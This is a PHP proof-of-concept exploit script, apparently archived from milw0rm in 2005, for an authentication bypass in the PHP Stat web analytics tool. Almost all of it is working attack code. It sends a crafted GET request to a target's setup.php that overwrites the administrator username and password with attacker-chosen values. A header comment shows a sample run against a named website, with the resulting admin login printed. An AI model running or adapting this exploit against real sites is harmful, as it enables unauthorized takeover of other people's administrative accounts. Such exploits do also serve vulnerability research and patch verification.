| <? | |
| /* | |
| ************************************************************** | |
| PHP Stat Administrative User Authentication Bypass POC Exploit | |
| Code by Nikyt0x - Soulblack Security Research | |
| ************************************************************** | |
| Advisory: | |
| http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt | |
| Saludos: | |
| Soulblack Staff, Status-x, NeosecurityTeam, | |
| KingMetal, SWP, Trespasser... | |
| nikyt0x@gmail.com | |
| http://www.nikyt0x.tk | |
| ************************************************************** | |
| **This Exploit Change Admin Username and Password | |
| **Username: admin | |
| **Password: admin | |
| ************************************************************** | |
| php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php | |
| ============================================================== | |
| PHP Stat Administrative User Authentication Bypass POC Exploit | |
| ============================================================== | |
| by Nikyt0x - Soulblack Security Research | |
| [+] Testing: www.spazfarm.com | |
| [+] Socket | |
| [+] Sending Exploit | |
| [+] OK | |
| Open www.spazfarm.com/spazstats/setup.php | |
| Username: admin | |
| Password: 123456 | |
| ************************************************************** | |
| */ | |
| // username and password | |
| $username = "admin"; | |
| $password = "123456"; | |
| function sh0w() | |
| { | |
| echo "\n ==============================================================\n"; | |
| echo " PHP Stat Administrative User Authentication Bypass POC Exploit\n"; | |
| echo " ==============================================================\n"; | |
| echo " by Nikyt0x - Soulblack Security Research\n\n"; | |
| } | |
| if ($argc != 3) | |
| { | |
| sh0w(); | |
| echo "\n\n Usage:\n sbphpstatpoc.php www.site.com /dir/to/setup.php\n"; | |
| exit(); | |
| } | |
| if(!ereg('setup.php',$argv[2])) { | |
| echo "URL to setup.php Incorrect.\n"; | |
| exit(0); | |
| } | |
| sh0w(); | |
| echo " [+] Testing: $argv[1]\n"; | |
| $s0ck3t = fsockopen($argv[1], 80); | |
| if (!$s0ck3t) { | |
| echo " [-] Socket\n"; | |
| exit(0); | |
| } else { | |
| $petici0n = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\r\n"; | |
| $petici0n .= "Host: $argv[1]\r\n"; | |
| $petici0n .= "Connection: Close\r\n\r\n"; | |
| echo " [+] Socket\n"; | |
| if(!fwrite($s0ck3t, $petici0n)) | |
| { | |
| echo " [-] Sending Exploit\n"; | |
| exit(0); | |
| } | |
| echo " [+] Sending Exploit\n"; | |
| while (!feof($s0ck3t)) { | |
| $g3tdata = fgets($s0ck3t, 1024); | |
| if (eregi('Setup has been updated',$g3tdata)) | |
| { | |
| echo " [+] OK\n\n"; | |
| echo " Open $argv[1]$argv[2]\n\n Username: $username\n Password: $password\n"; | |
| exit(); | |
| } | |
| } | |
| fclose($s0ck3t); | |
| } | |
| ?> | |
| # milw0rm.com [2005-05-30] |